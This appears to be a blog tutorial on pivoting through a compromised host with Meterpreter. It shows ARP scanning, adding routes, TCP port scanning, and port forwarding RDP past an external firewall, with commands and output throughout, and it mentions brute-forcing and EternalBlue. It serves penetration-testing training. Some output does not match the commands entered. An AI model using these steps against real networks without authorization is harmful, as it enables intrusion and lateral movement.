Scanning and Port Forwarding through a Meterpreter Session

Once you have compromised a system with Meterpreter, your next goal is to learn more about your target environment. To accomplish this goal we can do all our scanning and port forwarding through our Meterpreter session and use our compromised system to pivot through the network.

Find The IP Address

First, we need to find out what IP address our compromised system has. Run Ipconfig from within the meterpreter session, this will list all the network adapters showing all the IPs the compromised system has access to.

meterpreter > ipconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 2
============
Name : HP Network Team Uplink
Hardware MAC : ac:16:2d:8b:65:30
MTU : 1500
IPv4 Address : 10.0.0.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::69df:8883:3772:d46c
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 3
============
Name : HP Network Team NAS Network
Hardware MAC : ac:16:2d:8b:65:32
MTU : 1500
IPv4 Address : 192.168.2.1
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::8d75:bc52:3792:764f
IPv6 Netmask : ffff:ffff:ffff:ffff::

Scanning hosts

The System is connected to two different IP ranges this could lead to more targets to exploit. Now we need to find out if there are any other IP addresses within these IP ranges. To do this we can use one of the meterpreter scripts called arp_scanner. Arp_scanner will perform an ARP scan for a given IP range through a compromised host.

meterpreter > run arp_scanner -r 10.0.0.1/24
 [*] ARP Scanning 10.0.0.1/24
 [*] IP: 10.0.0.5 MAC 28:92:4a:37:39:26
 [*] IP: 10.0.0.7 MAC 88:51:fb:ae:12:60
 [*] IP: 10.0.0.130 MAC 3c:d9:2b:59:77:11
 [*] IP: 10.0.0.134 MAC e0:69:95:c0:ac:bd
 [*] IP: 10.0.0.132 MAC 6c:8f:b5:92:ae:68
 [*] IP: 10.0.0.138 MAC 00:80:92:f6:5b:93
 [*] IP: 10.0.0.139 MAC 48:ba:4e:38:ce:35
 [*] IP: 10.0.0.145 MAC 2c:44:fd:03:18:18
 [*] IP: 10.0.0.144 MAC 24:a4:3c:de:05:8a
 [*] IP: 10.0.0.147 MAC 00:11:32:6e:4d:8d
 [*] IP: 10.0.0.200 MAC 00:1f:33:7b:b9:2d
 [*] IP: 10.0.0.203 MAC 00:50:56:8e:1f:e6
 [*] IP: 10.0.0.205 MAC 00:15:5d:18:2b:01
 [*] IP: 10.0.0.210 MAC 68:b5:99:79:62:ac
 [*] IP: 10.0.0.211 MAC 68:b5:99:71:a7:56
 [*] IP: 10.0.0.213 MAC 68:b5:99:71:a7:5e
 [*] IP: 10.0.0.215 MAC 68:b5:99:79:62:b4
 [*] IP: 10.0.0.229 MAC 00:c0:b7:59:de:78
 [*] IP: 10.0.0.251 MAC 00:1d:aa:bb:f8:98
 [*] IP: 10.0.0.255 MAC ac:16:2d:8b:65:30
meterpreter > run arp_scanner -r 192.168.2.1/24
[*] ARP Scanning 192.168.2.1/24
[*] IP: 192.168.2.1 MAC ac:16:2d:8b:65:32
[*] IP: 192.168.2.255 MAC ac:16:2d:8b:65:32

Here we used the -r option to target the address range to scan in this case 10.0.0.1/24 and 192.168.2.1/24 see a list of other options below or type run arp_scanner -h.

meterpreter > run arp_scanner -h 
Metbackgrounderpreter Script for performing an ARPS Scan Discovery. 
OPTIONS: 
-h Help menu. 
-i Enumerate Local Interfaces 
-r <opt> The target address range or CIDR identifier 
-s Save found IP Addresses to logs.

The scan has returned a list of potential targets to attack from the results of our arp scan. Next, we need to add the route to our meterpreter session. We do these with the route add option in the msf console, you will need to background the meterpreter session first.

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > route add 10.0.0.1 255.255.255.0 1
[*] Route added
msf exploit(multi/handler) > route add 192.168.2.1 255.255.255.0 1
[*] Route added
msf exploit(multi/handler) > route print

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
 ------ ------- -------
 10.0.0.1 255.255.255.0 Session 1
 192.168.2.1 255.255.255.0 Session 1

[*] There are currently no IPv6 routes defined.

Notice the red number 1 at the end of the route add command, this describes the meterpreter session we are adding the route to and is very important, this implies the tunnel ID. The tunnel ID  must match up to our route that we are going to add. You can have many different tunnel ID’s to one or several different IP addresses and it is important to keep them straight.

Next, we need a port scanner to discover any open ports on the IP listed from our ARP scan To do this we load the TCP Portscanner found in the auxiliary tools and run it on the available IPs from the ARP scan.

msf exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.255
msf auxiliary(scanner/portscan/tcp) > set PORTS 1-1024
PORTS => 1-1024

This is where we set our  RHOSTS to the IP we want to scan and set the PORTS within the range we want to scan (1-1024). To see more options just type show options.

msf auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.2.255 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds

Then we type run and the results are listed.

msf auxiliary(scanner/portscan/tcp) > run

[+] 10.0.0.5: - 10.0.0.5:22 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:80 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:443 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

To scan another host reset the RHOST to one of the other addresses found in your arp scan at the beginning of this tutorial and re-run the scanner.

msf auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.7
RHOSTS => 10.0.0.7
msf auxiliary(scanner/portscan/tcp) > run

[+] 10.0.0.7: - 10.0.0.7:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

There are 5 different types of portscanner modules in the auxiliary/scanner/portscan and they are ACK, SYN, TCP, XMAS and ftpbounce. The only one that will work is TCP. the reason is that anything that uses raw sockets(like the syn scanner and others) will not work through the tunnel.

Portforward

Lastly, any ports that you find open in the above procedure can now be port forwarded to your localhost this is a lot like what you can do with an SSH tunnel. Check out my SSH tutorial here.

Basically, what this means is that say you find a host that has port 3389 open, this is the standard RDP port for Windows PCS and Servers, normally you would not be able to directly Remote Desktop to this port due to the presence of an external firewall. With a Meterpreter session on a host inside the network, you can forward that port to your local PC using the already established meterpreter session to tunnel the connection allowing you to just RDP locally on your host and bypassing the External firewall. Now, this does not have to be just for 3389 we could just as easily forward any port, for example, port 80  on a router and gain access to the login page allowing us to use local tools to brute force it or 445 and run the Eternalblue exploit remotely.

If you have been following along with all the steps above you will need to enter back into your already established meterpreter session. Now type portfwd -h to check out all the portfwd options. in meterpreter.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.

As you can see from the options above to create our port Forward you need to use portfwd add to create the port forward then -l to specify a local port that you want to map to the remote port with a -p and then tell it which host with a -r.

So your command should look something like this…

meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.10
[*] Local TCP relay created: :3389 <-> 10.0.0.10:3389

Now you have created your first port forward you can list your active port forwards by using the portfwd list command.

 

meterpreter > portfwd list

Active Port Forwards
====================

Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:3389 10.0.0.10:3389 Forward

1 total active port forwards.

 

Now you should be able to use any Remote Desktop client to RDP and connect to port 3389 locally, this will then tunnel the RDP connection through your meterpreter session to the client you specified by ipaddress inside the network.

rdp to local host

 

If you for any reason have to drop all your active port forwards use the portfwd flush. This flushes the list, disconnecting all of your open port forwards all at once.

meterpreter > portfwd flush
[*] Successfully stopped TCP relay on 0.0.0.0:3389
[*] Successfully flushed 1 rules

 

Reference

See below list of links I used to help create this tutorial, they also contain some great extra curriculum reading.

https://www.offensive-security.com/metasploit-unleashed/portfwd/

https://netsec.ws

https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909

As always please give any feedback about this tutorial in the comments below, I read every comment not flagged as spam also let me know any areas you would like me to cover in future tutorials.

Leave a Reply

Your email address will not be published. Required fields are marked *